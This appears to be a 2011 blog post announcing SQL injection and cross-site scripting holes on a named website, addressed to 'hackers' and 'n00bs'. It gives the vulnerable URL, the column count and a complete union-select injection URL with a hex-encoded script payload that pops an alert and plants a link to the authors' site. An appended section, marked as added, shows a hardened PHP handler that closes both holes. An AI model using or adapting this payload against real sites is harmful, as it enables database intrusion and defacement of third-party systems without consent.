The website kingtamil.com has been found to have SQLi and XSS vulnerabilities.
The bug was found by hussain.
Details for the hackers:
Vulnerable URL: kingtamil.com/videos.php?id=45
No. of columns: 7
Visible columns: 2, 4, 3.
Details for the n00bs:
Check the bug on the site by visiting the following URL.
http://kingtamil.com/videos.php?id=-45%20union%20select%201,concat(0x3C,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x61,0x6C,0x65,0x72,0x74,0x28,0x27,0x62,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x61,0x6E,0x64,0x20,0x68,0x75,0x73,0x73,0x61,0x69,0x6E,0x20,0x2D,0x2D,0x20,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x20,0x27,0x29,0x3B,0x3C,0x2F,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x3C,0x68,0x31,0x3E,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E,0x3C,0x2F,0x68,0x31,0x3E),3,4,5,6,7;--
Enjoy. R45c4l
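How a handler shaped like videos.php?id=N closes both bugs described above, as an added example that is not part of the original post or the site's code: the id is validated as an integer and bound as a query parameter, and every database value is HTML-encoded before output. The videos table, its column names and render_video() are hypothetical; only the column count (7) and the rendered columns (2, 3, 4) come from the post.

```php
<?php
// Added example: hardened handler for a videos.php?id=N style endpoint.
// Table and column names are hypothetical; the post only gives the column
// count (7) and which columns are rendered into the page (2, 3, 4).

/** Returns [HTTP status, HTML body] for the requested video id. */
function render_video(PDO $db, $rawId): array
{
    // 1. Accept only a positive integer id; anything else never reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, '<p>Invalid video id.</p>'];
    }

    // 2. Bind the id as a parameter so it is treated as data, not SQL text.
    $stmt = $db->prepare(
        'SELECT title, description, uploader FROM videos WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return [404, '<p>Video not found.</p>'];
    }

    // 3. HTML-encode every database value, so markup stored in (or injected
    //    into) a rendered column is displayed as text instead of executing.
    $e = fn($s) => htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return [200, '<h1>' . $e($row['title']) . '</h1>'
               . '<p>' . $e($row['description']) . '</p>'
               . '<p>Uploaded by ' . $e($row['uploader']) . '</p>'];
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE videos (id INTEGER PRIMARY KEY, title TEXT,
           description TEXT, uploader TEXT, url TEXT, views INTEGER, added TEXT)');
$db->exec("INSERT INTO videos VALUES (45, 'Demo <b>clip</b>', 'Constructed row',
           'admin', '/v/45.flv', 10, '2011-01-03')");

// A plain id renders with markup escaped; a non-integer id is rejected.
foreach (['45', '-45 union select 1,2,3,4,5,6,7'] as $input) {
    [$status, $html] = render_video($db, $input);
    echo $status, ' ', $html, "\n";
}
```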
Monday, January 3, 2011
bug found at kingtamil.com
10:11 AM
Unknown